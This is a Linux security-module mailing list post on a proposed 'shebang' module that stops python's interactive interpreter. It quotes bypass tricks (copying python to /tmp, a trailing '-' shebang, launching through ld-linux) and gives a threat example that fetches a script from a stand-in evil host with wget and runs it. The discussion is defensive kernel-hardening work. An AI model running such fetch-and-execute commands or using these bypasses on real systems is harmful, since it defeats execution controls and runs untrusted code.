[PATCH v1] shebang: restrict python interactive prompt/interpreter

Matt Brown matt at nmatt.com
Fri Jun 9 14:50:42 UTC 2017

On 6/9/17 10:02 AM, Tetsuo Handa wrote:
> Mimi Zohar wrote:
>> This patch defines a new, minor LSM named "shebang", that restricts
>> python such that scripts are allowed to execute, while the interactive
>> prompt/interpreter is not available.  When used in conjunction with an
>> IMA appraise execute policy requiring files signatures, only signed
>> python scripts would be allowed to execute.  (A separate method for
>> identifying "imported" code would need to be defined in order to verify
>> their file signatures.)

FYI Mimi posted this because of this current discussion here:

> Below case is blocked by IMA?
>    $ cp -p /usr/bin/python2 /tmp
>    $ /tmp/python2
> Below case is also blocked by IMA?
>    $ echo '#!/usr/bin/python2 -' > /tmp/run-python
>    $ chmod +x /tmp/run-python
>    $ /tmp/run-python

Does IMA have a way to prevent the following? I think this is the main
case we are protection against with this LSM.

$ wget www.evil.com/evil.py
$ /usr/bin/python2 evil.py

> What about execution via ld-linux ?
>    $ /lib64/ld-linux-x86-64.so.2 /usr/bin/python2

Just tested this and you are correct, this allows you to bypass the

I was able to fix this bypass by including /lib64/ld-linux-x86-64.so.2
in the list of interpreters.

To unsubscribe from this list: send the line "unsubscribe linux-security-module" in
the body of a message to majordomo at vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

More information about the Linux-security-module-archive mailing list